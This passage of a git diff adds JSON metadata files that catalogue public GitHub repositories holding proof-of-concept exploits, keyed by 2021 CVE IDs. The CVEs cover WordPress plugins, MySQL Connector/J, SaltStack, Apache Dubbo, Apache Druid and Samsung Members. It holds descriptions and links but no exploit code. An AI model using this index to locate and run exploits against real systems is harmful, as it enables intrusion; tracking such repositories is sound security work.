+ },
+ "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2021-24647",
+ "description": "CVE-2021-24647 Pie Register < 3.7.1.6 - Unauthenticated Arbitrary Login",
+ "fork": false,
+ "created_at": "2023-06-15T09:51:36Z",
+ "updated_at": "2023-08-14T10:37:29Z",
+ "pushed_at": "2023-06-15T09:57:51Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-24647",
+ "exploit",
+ "pie-register",
+ "wordpress",
+ "wordpress-plugin"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-2471.json b/2021/CVE-2021-2471.json
new file mode 100644
index 0000000000..7b9d9d36be
--- /dev/null
+++ b/2021/CVE-2021-2471.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 420001886,
+ "name": "jdbc-sqlxml-xxe",
+ "full_name": "SecCoder-Security-Lab\/jdbc-sqlxml-xxe",
+ "owner": {
+ "login": "SecCoder-Security-Lab",
+ "id": 92973688,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92973688?v=4",
+ "html_url": "https:\/\/github.com\/SecCoder-Security-Lab"
+ },
+ "html_url": "https:\/\/github.com\/SecCoder-Security-Lab\/jdbc-sqlxml-xxe",
+ "description": "h2-jdbc(https:\/\/github.com\/h2database\/h2database\/issues\/3195) & mysql-jdbc(CVE-2021-2471) SQLXML XXE vulnerability reproduction.",
+ "fork": false,
+ "created_at": "2021-10-22T07:14:25Z",
+ "updated_at": "2023-09-28T11:32:32Z",
+ "pushed_at": "2021-12-12T06:16:02Z",
+ "stargazers_count": 53,
+ "watchers_count": 53,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 53,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 420152716,
+ "name": "CVE-2021-2471",
+ "full_name": "cckuailong\/CVE-2021-2471",
+ "owner": {
+ "login": "cckuailong",
+ "id": 10824150,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10824150?v=4",
+ "html_url": "https:\/\/github.com\/cckuailong"
+ },
+ "html_url": "https:\/\/github.com\/cckuailong\/CVE-2021-2471",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-22T15:36:38Z",
+ "updated_at": "2023-09-28T11:32:33Z",
+ "pushed_at": "2021-10-23T02:06:40Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 420195489,
+ "name": "CVE-2021-2471",
+ "full_name": "DrunkenShells\/CVE-2021-2471",
+ "owner": {
+ "login": "DrunkenShells",
+ "id": 38487751,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38487751?v=4",
+ "html_url": "https:\/\/github.com\/DrunkenShells"
+ },
+ "html_url": "https:\/\/github.com\/DrunkenShells\/CVE-2021-2471",
+ "description": "PoC for CVE-2021-2471 - XXE in MySQL Connector\/J",
+ "fork": false,
+ "created_at": "2021-10-22T17:59:16Z",
+ "updated_at": "2023-09-28T11:32:33Z",
+ "pushed_at": "2021-10-22T18:21:39Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-24741.json b/2021/CVE-2021-24741.json
new file mode 100644
index 0000000000..da7f379f64
--- /dev/null
+++ b/2021/CVE-2021-24741.json
@@ -0,0 +1,34 @@
+[
+ {
+ "id": 400864585,
+ "name": "CVE-2021-24741",
+ "full_name": "itsjeffersonli\/CVE-2021-24741",
+ "owner": {
+ "login": "itsjeffersonli",
+ "id": 53053198,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53053198?v=4",
+ "html_url": "https:\/\/github.com\/itsjeffersonli"
+ },
+ "html_url": "https:\/\/github.com\/itsjeffersonli\/CVE-2021-24741",
+ "description": "Multiple SQL Injection Vulnerability in Support Board Version 3.3.3 that allow remote unauthenticated attacker to execute arbitrary SQL commands via status_code, department, user_id, conversation_id, conversation_status_code, and recipient_id parameters to ajax.php which is connected to functions.php which the vulnerability is present.",
+ "fork": false,
+ "created_at": "2021-08-28T18:34:40Z",
+ "updated_at": "2023-04-24T02:39:18Z",
+ "pushed_at": "2023-04-18T15:20:52Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-24750.json b/2021/CVE-2021-24750.json
new file mode 100644
index 0000000000..084c4da8d8
--- /dev/null
+++ b/2021/CVE-2021-24750.json
@@ -0,0 +1,35 @@
+[
+ {
+ "id": 448110286,
+ "name": "CVE-2021-24750",
+ "full_name": "fimtow\/CVE-2021-24750",
+ "owner": {
+ "login": "fimtow",
+ "id": 62258310,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62258310?v=4",
+ "html_url": "https:\/\/github.com\/fimtow"
+ },
+ "html_url": "https:\/\/github.com\/fimtow\/CVE-2021-24750",
+ "description": "Demonstration of the WP Visitor Statistics plugin exploit",
+ "fork": false,
+ "created_at": "2022-01-14T21:19:43Z",
+ "updated_at": "2024-03-04T06:29:35Z",
+ "pushed_at": "2022-01-18T08:59:41Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "exploit",
+ "wordpress"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-24807.json b/2021/CVE-2021-24807.json
new file mode 100644
index 0000000000..4585b17d3d
--- /dev/null
+++ b/2021/CVE-2021-24807.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 414551720,
+ "name": "CVE-2021-24807",
+ "full_name": "itsjeffersonli\/CVE-2021-24807",
+ "owner": {
+ "login": "itsjeffersonli",
+ "id": 53053198,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53053198?v=4",
+ "html_url": "https:\/\/github.com\/itsjeffersonli"
+ },
+ "html_url": "https:\/\/github.com\/itsjeffersonli\/CVE-2021-24807",
+ "description": "Support Board 3.3.4 Authenticated Stored XSS",
+ "fork": false,
+ "created_at": "2021-10-07T10:13:10Z",
+ "updated_at": "2021-11-14T20:35:20Z",
+ "pushed_at": "2021-10-07T10:31:30Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-24884.json b/2021/CVE-2021-24884.json
new file mode 100644
index 0000000000..025124cc29
--- /dev/null
+++ b/2021/CVE-2021-24884.json
@@ -0,0 +1,37 @@
+[
+ {
+ "id": 418585239,
+ "name": "CVE-2021-24884",
+ "full_name": "S1lkys\/CVE-2021-24884",
+ "owner": {
+ "login": "S1lkys",
+ "id": 40408435,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40408435?v=4",
+ "html_url": "https:\/\/github.com\/S1lkys"
+ },
+ "html_url": "https:\/\/github.com\/S1lkys\/CVE-2021-24884",
+ "description": "If an authenticated user who is able to edit Wordpress PHP code in any kind, clicks a malicious link, PHP code can be edited through XSS in Formidable Forms 4.09.04.",
+ "fork": false,
+ "created_at": "2021-10-18T16:37:08Z",
+ "updated_at": "2024-06-21T00:09:35Z",
+ "pushed_at": "2021-10-19T20:10:08Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "exploit",
+ "formidable",
+ "wordpress",
+ "xss"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-24917.json b/2021/CVE-2021-24917.json
new file mode 100644
index 0000000000..8912ef6fdb
--- /dev/null
+++ b/2021/CVE-2021-24917.json
@@ -0,0 +1,71 @@
+[
+ {
+ "id": 745792429,
+ "name": "CVE-2021-24917",
+ "full_name": "dikalasenjadatang\/CVE-2021-24917",
+ "owner": {
+ "login": "dikalasenjadatang",
+ "id": 78460398,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78460398?v=4",
+ "html_url": "https:\/\/github.com\/dikalasenjadatang"
+ },
+ "html_url": "https:\/\/github.com\/dikalasenjadatang\/CVE-2021-24917",
+ "description": "CVE-2021-24917 ",
+ "fork": false,
+ "created_at": "2024-01-20T06:36:13Z",
+ "updated_at": "2024-06-02T20:57:45Z",
+ "pushed_at": "2024-01-20T06:37:28Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 803067005,
+ "name": "CVE-2021-24917",
+ "full_name": "Cappricio-Securities\/CVE-2021-24917",
+ "owner": {
+ "login": "Cappricio-Securities",
+ "id": 102907425,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4",
+ "html_url": "https:\/\/github.com\/Cappricio-Securities"
+ },
+ "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2021-24917",
+ "description": "WordPress WPS Hide Login <1.9.1 - Information Disclosure",
+ "fork": false,
+ "created_at": "2024-05-20T02:07:52Z",
+ "updated_at": "2024-06-24T08:20:12Z",
+ "pushed_at": "2024-06-24T08:18:55Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-24917",
+ "cve-2021-24917-exploit",
+ "cve-2021-24917-poc",
+ "cve-2021-24917-scanner",
+ "information-disclosure",
+ "wapt",
+ "wps-hide-login",
+ "wps-hide-login-exploit"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-25003.json b/2021/CVE-2021-25003.json
new file mode 100644
index 0000000000..c3facce8da
--- /dev/null
+++ b/2021/CVE-2021-25003.json
@@ -0,0 +1,38 @@
+[
+ {
+ "id": 507577066,
+ "name": "CVE-2021-25003",
+ "full_name": "biulove0x\/CVE-2021-25003",
+ "owner": {
+ "login": "biulove0x",
+ "id": 105073212,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105073212?v=4",
+ "html_url": "https:\/\/github.com\/biulove0x"
+ },
+ "html_url": "https:\/\/github.com\/biulove0x\/CVE-2021-25003",
+ "description": "WPCargo < 6.9.0 - Unauthenticated RCE",
+ "fork": false,
+ "created_at": "2022-06-26T13:07:47Z",
+ "updated_at": "2022-12-02T10:27:12Z",
+ "pushed_at": "2022-06-27T13:19:50Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-25003",
+ "python3",
+ "vulnerabilities",
+ "wordpress",
+ "wordpress-plugin"
+ ],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-25032.json b/2021/CVE-2021-25032.json
new file mode 100644
index 0000000000..3fe8f21792
--- /dev/null
+++ b/2021/CVE-2021-25032.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 676499774,
+ "name": "CVE-2021-25032",
+ "full_name": "RandomRobbieBF\/CVE-2021-25032",
+ "owner": {
+ "login": "RandomRobbieBF",
+ "id": 51722811,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4",
+ "html_url": "https:\/\/github.com\/RandomRobbieBF"
+ },
+ "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2021-25032",
+ "description": "PublishPress Capabilities < 2.3.1 - Unauthenticated Arbitrary Options Update to Blog Compromise",
+ "fork": false,
+ "created_at": "2023-08-09T10:41:07Z",
+ "updated_at": "2023-11-13T00:41:02Z",
+ "pushed_at": "2023-08-09T10:43:54Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-25076.json b/2021/CVE-2021-25076.json
new file mode 100644
index 0000000000..447f6921ee
--- /dev/null
+++ b/2021/CVE-2021-25076.json
@@ -0,0 +1,37 @@
+[
+ {
+ "id": 499939338,
+ "name": "CVE-2021-25076",
+ "full_name": "0xAbbarhSF\/CVE-2021-25076",
+ "owner": {
+ "login": "0xAbbarhSF",
+ "id": 67552744,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67552744?v=4",
+ "html_url": "https:\/\/github.com\/0xAbbarhSF"
+ },
+ "html_url": "https:\/\/github.com\/0xAbbarhSF\/CVE-2021-25076",
+ "description": "Wordpress Plugin WP User Frontend < 3.5.26 - SQL-Injection (Authenticated)",
+ "fork": false,
+ "created_at": "2022-06-04T21:22:10Z",
+ "updated_at": "2023-09-28T11:39:25Z",
+ "pushed_at": "2022-06-04T21:24:22Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "2021-2022",
+ "cve",
+ "exploit",
+ "wordpress"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-25094.json b/2021/CVE-2021-25094.json
new file mode 100644
index 0000000000..fcd7cc617c
--- /dev/null
+++ b/2021/CVE-2021-25094.json
@@ -0,0 +1,122 @@
+[
+ {
+ "id": 444202507,
+ "name": "CVE-2021-25094-tatsu-preauth-rce",
+ "full_name": "darkpills\/CVE-2021-25094-tatsu-preauth-rce",
+ "owner": {
+ "login": "darkpills",
+ "id": 209987,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/209987?v=4",
+ "html_url": "https:\/\/github.com\/darkpills"
+ },
+ "html_url": "https:\/\/github.com\/darkpills\/CVE-2021-25094-tatsu-preauth-rce",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-01-03T21:19:42Z",
+ "updated_at": "2023-04-14T16:51:32Z",
+ "pushed_at": "2023-08-30T07:48:36Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 512323706,
+ "name": "typehub-exploiter",
+ "full_name": "TUANB4DUT\/typehub-exploiter",
+ "owner": {
+ "login": "TUANB4DUT",
+ "id": 41275808,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41275808?v=4",
+ "html_url": "https:\/\/github.com\/TUANB4DUT"
+ },
+ "html_url": "https:\/\/github.com\/TUANB4DUT\/typehub-exploiter",
+ "description": "GILANG - Exploiter for CVE-2021-25094",
+ "fork": false,
+ "created_at": "2022-07-10T02:01:11Z",
+ "updated_at": "2022-08-24T19:19:13Z",
+ "pushed_at": "2022-07-10T02:06:55Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 512491203,
+ "name": "CVE-2021-25094",
+ "full_name": "xdx57\/CVE-2021-25094",
+ "owner": {
+ "login": "xdx57",
+ "id": 86118516,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86118516?v=4",
+ "html_url": "https:\/\/github.com\/xdx57"
+ },
+ "html_url": "https:\/\/github.com\/xdx57\/CVE-2021-25094",
+ "description": "Tatsu Plugin ZIP File add_custom_font unrestricted upload",
+ "fork": false,
+ "created_at": "2022-07-10T17:01:43Z",
+ "updated_at": "2022-07-10T17:08:06Z",
+ "pushed_at": "2022-07-10T18:04:26Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 615683439,
+ "name": "TypeHub-Exploiter",
+ "full_name": "experimentalcrow1\/TypeHub-Exploiter",
+ "owner": {
+ "login": "experimentalcrow1",
+ "id": 127784592,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127784592?v=4",
+ "html_url": "https:\/\/github.com\/experimentalcrow1"
+ },
+ "html_url": "https:\/\/github.com\/experimentalcrow1\/TypeHub-Exploiter",
+ "description": "This script exploits a vulnerability (CVE-2021-25094) in the TypeHub WordPress plugin.",
+ "fork": false,
+ "created_at": "2023-03-18T11:26:09Z",
+ "updated_at": "2023-04-10T00:26:50Z",
+ "pushed_at": "2023-03-18T11:26:37Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-25162.json b/2021/CVE-2021-25162.json
new file mode 100644
index 0000000000..019ab6438f
--- /dev/null
+++ b/2021/CVE-2021-25162.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 411772722,
+ "name": "CVE-2021-25162",
+ "full_name": "twentybel0w\/CVE-2021-25162",
+ "owner": {
+ "login": "twentybel0w",
+ "id": 30179317,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30179317?v=4",
+ "html_url": "https:\/\/github.com\/twentybel0w"
+ },
+ "html_url": "https:\/\/github.com\/twentybel0w\/CVE-2021-25162",
+ "description": "CVE-2021-25162",
+ "fork": false,
+ "created_at": "2021-09-29T17:40:17Z",
+ "updated_at": "2021-09-29T17:41:14Z",
+ "pushed_at": "2021-09-29T17:41:11Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-25253.json b/2021/CVE-2021-25253.json
new file mode 100644
index 0000000000..98411fb0c8
--- /dev/null
+++ b/2021/CVE-2021-25253.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 640042584,
+ "name": "CVE-2021-25253",
+ "full_name": "msd0pe-1\/CVE-2021-25253",
+ "owner": {
+ "login": "msd0pe-1",
+ "id": 47142249,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47142249?v=4",
+ "html_url": "https:\/\/github.com\/msd0pe-1"
+ },
+ "html_url": "https:\/\/github.com\/msd0pe-1\/CVE-2021-25253",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-05-12T20:51:50Z",
+ "updated_at": "2024-01-18T05:25:25Z",
+ "pushed_at": "2023-05-12T20:52:09Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-25281.json b/2021/CVE-2021-25281.json
new file mode 100644
index 0000000000..0a77c996d6
--- /dev/null
+++ b/2021/CVE-2021-25281.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 342564562,
+ "name": "CVE-2021-25281",
+ "full_name": "Immersive-Labs-Sec\/CVE-2021-25281",
+ "owner": {
+ "login": "Immersive-Labs-Sec",
+ "id": 79456607,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79456607?v=4",
+ "html_url": "https:\/\/github.com\/Immersive-Labs-Sec"
+ },
+ "html_url": "https:\/\/github.com\/Immersive-Labs-Sec\/CVE-2021-25281",
+ "description": "Chaining CVE-2021-25281 and CVE-2021-25282 to exploit a SaltStack",
+ "fork": false,
+ "created_at": "2021-02-26T12:08:25Z",
+ "updated_at": "2023-07-19T01:34:41Z",
+ "pushed_at": "2021-03-06T12:50:35Z",
+ "stargazers_count": 26,
+ "watchers_count": 26,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 26,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-25374.json b/2021/CVE-2021-25374.json
new file mode 100644
index 0000000000..be9f505525
--- /dev/null
+++ b/2021/CVE-2021-25374.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 356532468,
+ "name": "CVE-2021-25374_Samsung-Account-Access",
+ "full_name": "WithSecureLabs\/CVE-2021-25374_Samsung-Account-Access",
+ "owner": {
+ "login": "WithSecureLabs",
+ "id": 99874690,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99874690?v=4",
+ "html_url": "https:\/\/github.com\/WithSecureLabs"
+ },
+ "html_url": "https:\/\/github.com\/WithSecureLabs\/CVE-2021-25374_Samsung-Account-Access",
+ "description": "This script can be used to gain access to a victim's Samsung Account if they have a specific version of Samsung Members installed on their Samsung Device, and if the victim's device is from the US or Korea region.",
+ "fork": false,
+ "created_at": "2021-04-10T09:23:52Z",
+ "updated_at": "2024-06-25T07:50:37Z",
+ "pushed_at": "2024-02-25T02:15:22Z",
+ "stargazers_count": 23,
+ "watchers_count": 23,
+ "has_discussions": false,
+ "forks_count": 19,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 19,
+ "watchers": 23,
+ "score": 0,
+ "subscribers_count": 8
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-25461.json b/2021/CVE-2021-25461.json
new file mode 100644
index 0000000000..19a4a2b996
--- /dev/null
+++ b/2021/CVE-2021-25461.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 463240147,
+ "name": "CVE-2021-25461",
+ "full_name": "bkojusner\/CVE-2021-25461",
+ "owner": {
+ "login": "bkojusner",
+ "id": 25017260,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25017260?v=4",
+ "html_url": "https:\/\/github.com\/bkojusner"
+ },
+ "html_url": "https:\/\/github.com\/bkojusner\/CVE-2021-25461",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-02-24T17:28:58Z",
+ "updated_at": "2022-04-06T05:11:43Z",
+ "pushed_at": "2022-07-23T16:16:42Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-25641.json b/2021/CVE-2021-25641.json
new file mode 100644
index 0000000000..50f4a7fceb
--- /dev/null
+++ b/2021/CVE-2021-25641.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 374287562,
+ "name": "CVE-2021-25641-Proof-of-Concept",
+ "full_name": "Dor-Tumarkin\/CVE-2021-25641-Proof-of-Concept",
+ "owner": {
+ "login": "Dor-Tumarkin",
+ "id": 23374015,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23374015?v=4",
+ "html_url": "https:\/\/github.com\/Dor-Tumarkin"
+ },
+ "html_url": "https:\/\/github.com\/Dor-Tumarkin\/CVE-2021-25641-Proof-of-Concept",
+ "description": "Apache\/Alibaba Dubbo <= 2.7.3 PoC Code for CVE-2021-25641 RCE via Deserialization of Untrusted Data; Affects Versions <= 2.7.6 With Different Gadgets",
+ "fork": false,
+ "created_at": "2021-06-06T06:41:36Z",
+ "updated_at": "2024-05-21T08:51:15Z",
+ "pushed_at": "2021-06-06T08:41:19Z",
+ "stargazers_count": 53,
+ "watchers_count": 53,
+ "has_discussions": false,
+ "forks_count": 13,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 13,
+ "watchers": 53,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 564175641,
+ "name": "CVE-2021-25641",
+ "full_name": "l0n3rs\/CVE-2021-25641",
+ "owner": {
+ "login": "l0n3rs",
+ "id": 31120718,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31120718?v=4",
+ "html_url": "https:\/\/github.com\/l0n3rs"
+ },
+ "html_url": "https:\/\/github.com\/l0n3rs\/CVE-2021-25641",
+ "description": "A Exploit Tool For CVE-2021-25641.",
+ "fork": false,
+ "created_at": "2022-11-10T06:33:54Z",
+ "updated_at": "2022-11-11T00:45:15Z",
+ "pushed_at": "2022-11-10T06:48:46Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-25642.json b/2021/CVE-2021-25642.json
new file mode 100644
index 0000000000..d938c3d718
--- /dev/null
+++ b/2021/CVE-2021-25642.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 529105930,
+ "name": "CVE-2021-25642",
+ "full_name": "safe3s\/CVE-2021-25642",
+ "owner": {
+ "login": "safe3s",
+ "id": 108328094,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108328094?v=4",
+ "html_url": "https:\/\/github.com\/safe3s"
+ },
+ "html_url": "https:\/\/github.com\/safe3s\/CVE-2021-25642",
+ "description": "CVE-2021-25642",
+ "fork": false,
+ "created_at": "2022-08-26T03:51:58Z",
+ "updated_at": "2022-08-26T03:51:58Z",
+ "pushed_at": "2022-08-26T03:51:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-25646.json b/2021/CVE-2021-25646.json
new file mode 100644
index 0000000000..257971f97f
--- /dev/null
+++ b/2021/CVE-2021-25646.json
@@ -0,0 +1,218 @@
+[
+ {
+ "id": 335501856,
+ "name": "cve-2021-25646",
+ "full_name": "yaunsky\/cve-2021-25646",
+ "owner": {
+ "login": "yaunsky",
+ "id": 48243087,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48243087?v=4",
+ "html_url": "https:\/\/github.com\/yaunsky"
+ },
+ "html_url": "https:\/\/github.com\/yaunsky\/cve-2021-25646",
+ "description": "Apache Druid 远程代码执行;检测脚本",
+ "fork": false,
+ "created_at": "2021-02-03T03:59:52Z",
+ "updated_at": "2023-11-20T12:38:45Z",
+ "pushed_at": "2021-02-03T06:06:24Z",
+ "stargazers_count": 14,
